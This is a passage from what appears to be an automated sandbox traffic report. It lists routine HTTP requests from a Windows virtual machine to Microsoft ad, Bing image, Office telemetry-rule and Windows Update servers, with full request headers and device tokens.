t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAdddCDU6xcjr4JQG4Q5CqQxYxRM7l7bC2MlFt9QO4Uu+ii8g720LG20edSSoTxnVPQfVrlOu/1noHbdP1+SiDi5DXdT/uC4gyHD0VoOT8ej2C+khCyhpug75SlIEjFej8fFvFo7FRZmWh8e545MnqHUljhAUzmKsKLRg/3UcXh4JkTf7zSwTP9Crj3xvwV1r5M6EZ2sADzFErRcH2T24HTT5pOeqDoqUYjhsuCPe3yRmQrN0Jxh9YUgKXYnq69TAggEbmdB1hu9ZbRMSeeNln3HQwGNpDyLAvfI/4qb8hmqcUU1ZMGFO6SmtXaqVqSt9dfRZCFSE0gLywHw9AU/GzhwQZgAAEFEx4GTAhho3OjsZqAmeDBGwAZrzfXIbMVmxY0gq43gsR+XFsMJV2em1OpWyTkKCsmCfRc0fQ2P3M5FixVfVvC6+Elf6vKcOvvh2O1ligabHXzOlv0+PIDskSvaKEEsNK4lFZgVuuCQvOcOeBFJFsoScYFvtgGuQFqbDJPhPXRk2Kns3oBWGkhojE39/8dhbMYxASaLuL6WGyWx5zYb5ofoKVgqa3ptlwEadefCXtg4fWmkirEAGZQaUFDXAU2t6EB61kHyIJcwVHqXJ2un3vVklw3loObixAHiUyJpucs9UOzZeo+QuKqRj9UBkZ0l+xHKRCSrHpOxSz2KC3NaERTi0TNkOyV2KPCwH/DiizCJkQat+YtCrfaUrnP8JpUx+sHRnirFRpxJie0ZUQ9EweMiOw9v3uqu/l+kr36/nMxN9zDoPFklZLXJwHnstSY3kHNbfUV00laThjc3ROnFULKiu9uplrlhqZuw1+UXjMoRKswiIfGoG2P/2TfNyGX+p2NQqqtWJJpacJswbPDatcvqWBUAK2nvgrOuvvuunq3A/uRzjbXrFE5SWyODjPGzEL9hUSiKn1V5c54BVjvH66nb0DNcB&p=Cache-Control: no-cacheMS-CV: cfBi9oBThkS/fW90.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141651Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=6e3d5c7f28304154b7e32185d88f14c6&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595198&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595198&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAdddCDU6xcjr4JQG4Q5CqQxYxRM7l7bC2MlFt9QO4Uu+ii8g720LG20edSSoTxnVPQfVrlOu/1noHbdP1+SiDi5DXdT/uC4gyHD0VoOT8ej2C+khCyhpug75SlIEjFej8fFvFo7FRZmWh8e545MnqHUljhAUzmKsKLRg/3UcXh4JkTf7zSwTP9Crj3xvwV1r5M6EZ2sADzFErRcH2T24HTT5pOeqDoqUYjhsuCPe3yRmQrN0Jxh9YUgKXYnq69TAggEbmdB1hu9ZbRMSeeNln3HQwGNpDyLAvfI/4qb8hmqcUU1ZMGFO6SmtXaqVqSt9dfRZCFSE0gLywHw9AU/GzhwQZgAAEFEx4GTAhho3OjsZqAmeDBGwAZrzfXIbMVmxY0gq43gsR+XFsMJV2em1OpWyTkKCsmCfRc0fQ2P3M5FixVfVvC6+Elf6vKcOvvh2O1ligabHXzOlv0+PIDskSvaKEEsNK4lFZgVuuCQvOcOeBFJFsoScYFvtgGuQFqbDJPhPXRk2Kns3oBWGkhojE39/8dhbMYxASaLuL6WGyWx5zYb5ofoKVgqa3ptlwEadefCXtg4fWmkirEAGZQaUFDXAU2t6EB61kHyIJcwVHqXJ2un3vVklw3loObixAHiUyJpucs9UOzZeo+QuKqRj9UBkZ0l+xHKRCSrHpOxSz2KC3NaERTi0TNkOyV2KPCwH/DiizCJkQat+YtCrfaUrnP8JpUx+sHRnirFRpxJie0ZUQ9EweMiOw9v3uqu/l+kr36/nMxN9zDoPFklZLXJwHnstSY3kHNbfUV00laThjc3ROnFULKiu9uplrlhqZuw1+UXjMoRKswiIfGoG2P/2TfNyGX+p2NQqqtWJJpacJswbPDatcvqWBUAK2nvgrOuvvuunq3A/uRzjbXrFE5SWyODjPGzEL9hUSiKn1V5c54BVjvH66nb0DNcB&p=Cache-Control: no-cacheMS-CV: cfBi9oBThkS/fW90.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141710Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=38b8ffdc5fae431fa656bce55474b4f3&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-338387&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=Cache-Control: no-cacheMS-CV: X9z08fzW0EqxM+zr.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141710Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=e8e1edd3aebd456bb192bdfa879b52d0&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-338388&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=Cache-Control: no-cacheMS-CV: X9z08fzW0EqxM+zr.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141710Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=7d667f6e3a1d4c35ab3cf44b3e8a1285&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-280815&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=Cache-Control: no-cacheMS-CV: X9z08fzW0EqxM+zr.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239351692183_1GSWAYG616F8PFDNZ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239351692182_1I6V30R2J66NF61KL&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239402456886_16PSERWAUMTCB5AWR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239402415510_1LQQ8WSBAXW97X0WT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239339388107_1RNTUVYHPUHJQ1IFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=1868311687&PG=PC000P0FR5.0000000IRU&REQASID=F40D71FD2D2F41BCA7C5C4D26E91B507&UNID=338389&ASID=b4854a4670964a30867ebc7644e57121&&DS_EVTID=F40D71FD2D2F41BCA7C5C4D26E91B507&DEVOSVER=10.0.19045.2006&REQT=20241121T141705&TIME=20241121T141710Z&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239339388108_1KZ6HVDK2OYWY9XA8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=1868311687&PG=PC000P0FR5.0000000IRU&REQASID=F40D71FD2D2F41BCA7C5C4D26E91B507&UNID=338389&ASID=b4854a4670964a30867ebc7644e57121&&DS_EVTID=F40D71FD2D2F41BCA7C5C4D26E91B507&DEVOSVER=10.0.19045.2006&REQT=20241121T141705&TIME=20241121T141710Z&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XReSa52zmeSff4o&MD=elPKToF1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
